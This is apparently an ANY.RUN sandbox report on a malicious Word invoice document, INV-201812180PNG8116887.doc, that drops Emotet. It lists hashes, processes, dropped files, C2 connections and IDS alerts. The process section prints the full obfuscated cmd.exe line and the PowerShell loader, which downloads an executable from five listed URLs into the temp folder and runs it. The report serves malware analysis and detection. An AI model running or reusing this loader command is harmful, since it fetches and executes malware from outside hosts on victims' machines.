analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

INV-201812180PNG8116887.doc

Full analysis: https://app.any.run/tasks/be6405ad-560b-4cc7-a73a-a4bd7750e01e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 18, 2018, 14:34:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
trojan
emotet
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 13:25:00 2018, Last Saved Time/Date: Tue Dec 18 13:25:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 15, Security: 0
MD5:

6E9197C1AC6E60556E13C2371F175CA6

SHA1:

92D1F7E931B9FC0B82A146285AA65310B2054AF2

SHA256:

43ACAE6A948AF90750864D80526B762239FF4D12B55B0D0FA2981F02E604D2AE

SSDEEP:

1536:pq81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadwT4/3/g+a9:pq8GhDS0o9zTGOZD6EbzCdz/3/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2692)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2692)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2572)
    • Application was dropped or rewritten from another process

      • 150.exe (PID: 3908)
      • 150.exe (PID: 3008)
      • archivesymbol.exe (PID: 3344)
      • archivesymbol.exe (PID: 2608)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2676)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2676)
    • EMOTET was detected

      • archivesymbol.exe (PID: 3344)
    • Connects to CnC server

      • archivesymbol.exe (PID: 3344)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 3344)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4028)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2676)
      • 150.exe (PID: 3008)
    • Creates files in the user directory

      • powershell.exe (PID: 2676)
    • Starts itself from another location

      • 150.exe (PID: 3008)
    • Connects to unusual port

      • archivesymbol.exe (PID: 3344)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2692)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2692)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:18 13:25:00
ModifyDate: 2018:12:18 13:25:00
Pages: 1
Words: 2
Characters: 15
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 16
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
8
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 150.exe no specs 150.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2692"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INV-201812180PNG8116887.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4028c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2572CmD /V:/C"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2676powershell $KSv='DfV';$ohl=new-object Net.WebClient;$lIY='http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@http://www.trinityriveroutfitters.com/W4CGsWIzI@http://www.hayashitoysmart.com/add_favorites/XJJSoydNv@http://cleeft.nl/60ILq1CgH'.Split('@');$svv='mba';$iro = '150';$FBp='Wjn';$kjh=$env:temp+'\'+$iro+'.exe';foreach($wFR in $lIY){try{$ohl.DownloadFile($wFR, $kjh);$jVi='ORc';If ((Get-Item $kjh).length -ge 80000) {Invoke-Item $kjh;$bLW='iGG';break;}}catch{}}$HTB='tWJ';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3908"C:\Users\admin\AppData\Local\Temp\150.exe" C:\Users\admin\AppData\Local\Temp\150.exepowershell.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
3008"C:\Users\admin\AppData\Local\Temp\150.exe"C:\Users\admin\AppData\Local\Temp\150.exe
150.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2608"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe150.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
3344"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Version:
8.00.0.010
Total events
1 770
Read events
1 287
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2692WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR592D.tmp.cvr
MD5:
SHA256:
2692WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\104D8F32.wmf
MD5:
SHA256:
2692WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73B2E610.wmf
MD5:
SHA256:
2676powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AX3Z0S86PAFWH1H3OGK9.temp
MD5:
SHA256:
2692WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6C3A26A298C70CD61C1986CD33220E68
SHA256:7A6FF88FBCE1B2C280852428E4C8F4968DA16C34F03C04BB74BB5622AA1AAD3D
3008150.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:92976E94E53BDFF1CFAAC35CD50B0CE9
SHA256:056F46ABD59DB5EEA1E2566B7A2469BFE3DB593645A0A2C1403DC6313ABF7238
2692WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1DC808B5.wmfwmf
MD5:3B1C01DB4B268161CA0612F9E2918F59
SHA256:821F9383EA064E7E2F015FC25BEAB6CC05A67C05FB81BEA73530DB4621625B46
2676powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2692WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6E0318B.wmfwmf
MD5:80DDC77924ABF718E98A63612BA3634B
SHA256:2AF9B57C84824E27834B7377CB0E2F058E85582BF4DAC32D217996CE9DB14CC7
2692WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$V-201812180PNG8116887.docpgc
MD5:A47126F07A52EF4DB3ED6E5A3CB1109E
SHA256:F8D039710FE0572C3B93913381F0D9A1EDBD4A40DE02159D14BD7114F70A3E0C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
7
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3344
archivesymbol.exe
GET
78.189.21.131:80
http://78.189.21.131/
TR
malicious
2676
powershell.exe
GET
301
144.76.122.10:80
http://www.ideenweberei.com/L9NXvhd
DE
html
244 b
malicious
2676
powershell.exe
GET
200
144.76.122.10:80
http://www.ideenweberei.com/L9NXvhd/
DE
executable
124 Kb
malicious
3344
archivesymbol.exe
GET
187.140.90.91:8080
http://187.140.90.91:8080/
MX
malicious
3344
archivesymbol.exe
GET
200
201.190.150.60:443
http://201.190.150.60:443/
AR
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3344
archivesymbol.exe
78.189.21.131:80
Turk Telekom
TR
malicious
2676
powershell.exe
144.76.122.10:80
www.ideenweberei.com
Hetzner Online GmbH
DE
suspicious
3344
archivesymbol.exe
213.120.119.231:8443
British Telecommunications PLC
GB
malicious
3344
archivesymbol.exe
187.140.90.91:8080
Uninet S.A. de C.V.
MX
malicious
3344
archivesymbol.exe
201.190.150.60:443
ARLINK S.A.
AR
malicious
3344
archivesymbol.exe
81.150.17.158:50000
British Telecommunications PLC
GB
malicious
3344
archivesymbol.exe
81.150.17.158:8443
British Telecommunications PLC
GB
malicious

DNS requests

Domain
IP
Reputation
www.ideenweberei.com
  • 144.76.122.10
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
2676
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2676
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2676
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2676
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2676
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3344
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3344
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3344
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3344
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3344
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3 ETPRO signatures available at the full report
No debug info